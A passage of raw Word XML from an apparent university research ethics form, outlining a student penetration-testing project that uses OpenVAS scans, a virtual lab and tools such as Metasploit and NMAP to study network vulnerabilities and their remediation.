            <w:r w:rsidRPr="00E42F41">
              <w:t>Purpose of Research Activity</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2CCE75DD" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="078C765B" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>To determine the potential cyber security risks and vulnerabilities of a network.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="32A53715" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidDel="00425DA7" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidDel="002A152D" w14:paraId="2A48C96B" w14:textId="77777777" w:rsidTr="00693FAD">
        <w:trPr>
          <w:trHeight w:val="454"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="255" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="15E501BA" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:lastRenderedPageBreak/>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4745" w:type="pct"/>
            <w:gridSpan w:val="4"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0D7FF12C" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>Research Question</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0053EC18" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2E9516A8" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>Has this network been configured in such a way as it can be breached?</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2892FEE1" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E42F41" w:rsidRPr="00E42F41" w14:paraId="0DAA7882" w14:textId="77777777" w:rsidTr="00693FAD">
        <w:trPr>
          <w:trHeight w:val="454"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="255" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="4563D2E1" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4745" w:type="pct"/>
            <w:gridSpan w:val="4"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="219DE6BE" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>Aims of Research Activity</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="41A9DB2B" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2C49D9CA" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>The aim of this report is to determine whether a network and cyber security stance is sufficient to defend against online penetration tests.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2834D3B4" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E42F41" w:rsidRPr="00E42F41" w14:paraId="085B8C44" w14:textId="77777777" w:rsidTr="00693FAD">
        <w:trPr>
          <w:trHeight w:val="454"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="255" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="5FDDDE14" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4745" w:type="pct"/>
            <w:gridSpan w:val="4"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5D9D90B6" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>Objectives of Research Activity</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="00C58218" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="341C7C61" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>The results of a vulnerability scan will be used to design scenarios whereby these vulnerabilities could be used to exploit the network security either internally, externally or remotely.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="43DC6EC7" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7A92AFF4" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t xml:space="preserve">These scenarios will be simulated in a virtual environment. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="68751C20" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6FC4D475" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t xml:space="preserve">The in-depth planning and detailed steps of every test will demonstrate to future penetration test students how to use vulnerabilities to plan and formulate ways of exploiting networks right through to the design and execution. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6D178EBA" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3BCB6A16" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>The other purpose of this investigation is to illustrate the need to keep network systems up-to-date and how mitigation could be put in place by running simple scans and using the output to remediate any issues.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="05B192DB" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E42F41" w:rsidRPr="00E42F41" w14:paraId="12019378" w14:textId="77777777" w:rsidTr="00693FAD">
        <w:trPr>
          <w:trHeight w:val="454"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="255" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="3B20C2BA" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4745" w:type="pct"/>
            <w:gridSpan w:val="4"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="72DB31FC" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>Proposed methods (maximum 600 words)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5E197746" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>Provide a brief summary of all the methods that may be used in the research activity, making it clear what specific techniques may be used. If methods other than those listed in this section are deemed appropriate later, additional ethical approval for those methods will be needed.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E42F41" w:rsidRPr="00E42F41" w14:paraId="07B4B84E" w14:textId="77777777" w:rsidTr="00693FAD">
        <w:trPr>
          <w:trHeight w:val="454"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="255" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="618330AB" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4745" w:type="pct"/>
            <w:gridSpan w:val="4"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="00EEF44E" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6A1F0231" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t xml:space="preserve">A scan using OpenVas (Greenbone Vulnerability Management) will be run, and the output used to plan a series of scenarios whereby the vulnerabilities could be exploited. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="42A3F1EF" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="268544DA" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>These theories will then be tested using a virtual environment.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="61AF2FAB" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="18C4901C" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>List of possible tools:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="47D9459B" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7550376D" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
              </w:rPr>
              <w:t>Oracle VM VirtualBox</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="216B54EC" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
              </w:rPr>
              <w:t>Kali Linux</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2DA5B32F" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
              </w:rPr>
              <w:t>Metasploit Framework</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="48D7D68F" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
              </w:rPr>
              <w:t>FuzzBunch Framework</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1B4F068A" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
              </w:rPr>
              <w:t>NMAP</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="41BAA6C3" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
              </w:rPr>
              <w:t>Wireshark</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="309C5D62" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
              </w:rPr>
              <w:t>OpenVas (Greenbone Vulnerability Management)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="79B74A92" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E42F41" w:rsidRPr="00E42F41" w14:paraId="37C722A5" w14:textId="77777777" w:rsidTr="00693FAD">
        <w:trPr>
          <w:trHeight w:val="454"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="255" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="3B0F4627" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4745" w:type="pct"/>
            <w:gridSpan w:val="4"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="54031A63" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>Location of research activity</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1618281A" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>Identify all locations where research activity will take place.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E42F41" w:rsidRPr="00E42F41" w14:paraId="0A7AC27E" w14:textId="77777777" w:rsidTr="00693FAD">
        <w:trPr>
          <w:trHeight w:val="454"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="255" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="6D88EC6E" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:lastRenderedPageBreak/>
              <w:t>11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4745" w:type="pct"/>
            <w:gridSpan w:val="4"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="38E325A8" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7D2874DF" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>UWTSD and home.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="14187CDC" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E42F41" w:rsidRPr="00E42F41" w14:paraId="130A9596" w14:textId="77777777" w:rsidTr="00693FAD">
        <w:trPr>
          <w:trHeight w:val="454"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="255" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="22840297" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4745" w:type="pct"/>
            <w:gridSpan w:val="4"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3D6411C7" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>Research activity outside of the UK</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="430ADE9A" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">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E42F41" w:rsidRPr="00E42F41" w14:paraId="07E2A7D9" w14:textId="77777777" w:rsidTr="00693FAD">
        <w:trPr>
          <w:trHeight w:val="454"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="255" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="18195497" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>13</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4745" w:type="pct"/>
            <w:gridSpan w:val="4"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1ECEE812" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="02A9AB65" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>N/A</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="422105A7" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:i/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid1"/>
        <w:tblW w:w="10490" w:type="dxa"/>
        <w:tblInd w:w="-289" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="567"/>
        <w:gridCol w:w="7371"/>
        <w:gridCol w:w="1276"/>
        <w:gridCol w:w="1276"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E42F41" w:rsidRPr="00E42F41" w14:paraId="3EE7664B" w14:textId="77777777" w:rsidTr="00CA0B92">
        <w:trPr>
          <w:trHeight w:val="383"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="1D4DE196" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>14</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7371" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4FD40258" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t xml:space="preserve">Use of documentation not in the public domain: Are any documents </w:t>
            </w:r>
            <w:r w:rsidRPr="00E42F41">
              <w:rPr>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>NOT</w:t>
            </w:r>
            <w:r w:rsidRPr="00E42F41">
              <w:t xml:space="preserve"> publicly available?   </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="136AD56B" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1276" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
